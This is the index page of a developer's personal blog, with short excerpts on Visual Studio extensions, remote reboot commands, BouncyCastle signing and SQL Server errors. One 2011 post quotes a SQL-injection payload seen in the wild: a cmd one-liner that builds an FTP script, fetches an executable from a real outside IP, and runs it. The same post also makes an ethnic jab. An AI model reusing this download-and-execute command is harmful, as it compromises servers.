Yeah – finished AI class!

On December 21, 2011, in Uncategorized, by Jesper Angelo

Just finished the Stanford AI Class this fall and got an A. It feels pretty good Next up is probably another Cryptography class or maybe some machine learning.

Good FW, good FW!

On September 16, 2011, in Uncategorized, by Jesper Angelo

Don’t you just love SQL injections… and hate those chinese… cmd /c echo open 116.255.164.229>c:\RECYCLER\zysdfghaa.exe&echo kangbaobao>>c:\RECYCLER\zysdfghaa.exe&echo lifating>>c:\RECYCLER\zysdfghaa.exe&echo get sdfghaa.exe c:\RECYCLER\stsdfghaa.exe>>c:\RECYCLER\zysdfghaa.exe&echo bye>>c:\RECYCLER\zysdfghaa.exe&ftp -s:c:\RECYCLER\zysdfghaa.exe&if EXIST c:\RECYCLER\stsdfghaa.exe (start c:\RECYCLER\stsdfghaa.exe)&del c:\RECYCLER\zysdfghaa.exe&exit  

Must have extensions for Visual Studio 2010

On September 13, 2011, in Development Tools, MICROSOFT, Visual Studio, by Jesper Angelo

I guess everyone has a list like this, so here is what I’m packing in my VS2010 lunchbox:   Extensions Productivity Tools VSCommands 2010 - Install, read about it, then realize why you need this! Productivity Power Tools – Power Commands for Visual Studio 2010 – VS10x Comments Extender – VS10x Method Block Highlighter –   [...]

The AWS Outage: The Cloud’s Shining Moment – O’Reilly Broadcast

On April 25, 2011, in Cloud, Servers Products and Solutions, by Jesper Angelo

In a mining factory it’s easy, very easy to rely on backbone infrastructure. Locally we run VMWare – and maybe I should finally move forward on the DFF model and aws: The AWS Outage: The Cloud’s Shining Moment – O’Reilly Broadcast.

Rebooting a remote desktop as Administrator using command line

On November 15, 2010, in MICROSOFT, Uncategorized, by Jesper Angelo

Just like this: runas /user:Administrator@mydomain.com “shutdown -r -m \\MACHINE_IM_RESTARTING -t 3 -d P:00:00″ runas = run as a different user, in this case admin. shutdown options: -m = Machine name with \\ in front of the name -r = Reboot (not shut down) -t 3 = Show clients a warning for 3 seconds -d P:00:00 [...]

Using BouncyCastle to create .p7m signatures (response to #stackoverflow)

On October 16, 2010, in Cryptology, Development Tools, by Jesper Angelo

On #stackoverflow, a question was asked: I starting with BouncyCastleCrypto.dll and I’n not found enought documentation. I need one example of how can I sign a file with different alghoritmsLike sha1 sha256 and other and obtain .p7m file. This is an example. You’ll need a .pfx with the private key prior to running this stub [...]

NoShop plugin for wordpress alpha released

On October 11, 2010, in Wordpress, by Jesper Angelo

I’ve released the first alpha of my #NoShop #Wordpress plugin. http://jesper.angelo.net/wordpress/noshop/ Comments appreciated!

Assembly generation failed — Referenced assembly does not have a strong name

On October 11, 2010, in Business One, Business One, Development Tools nono, SAP, by Jesper Angelo

Today I had a wonderful start of the week. My code, that used to compile, now says: Assembly generation failed — Referenced assembly does not have a strong name. Ok! Fine, let’s see, what did I change… nothing. Great. After some digging around I found out that somehow my COM DLL, in this case SAPbobsCOM2007.DLL [...]

Why can all my users can see everything in SharePoint 2007?

On September 29, 2010, in MICROSOFT, SharePoint, by Jesper Angelo

http://vmintranet:36963/_admin/policy.aspx http://office12.blogspot.com/2007/05/policy-for-web-application-and-form.html http://blogs.msdn.com/b/joelo/archive/2007/04/02/web-application-policies.aspx http://technet.microsoft.com/en-us/library/cc262118(office.12).aspx

SQL 2005 Fatal Error during de-install

On June 29, 2010, in -3, by Jesper Angelo

During de-install, or service pack upgrade, or anything else with SQL 2005 setup, you get this error: Microsoft SQL Server 2005 Setup The setup has encountered an unexpected error while Setting Internal Properties. The error is: Fatal error during installation. For help, click: Microsoft Help Link This is how it looks on screen: MS explains: http://support.microsoft.com/kb/925976 [...]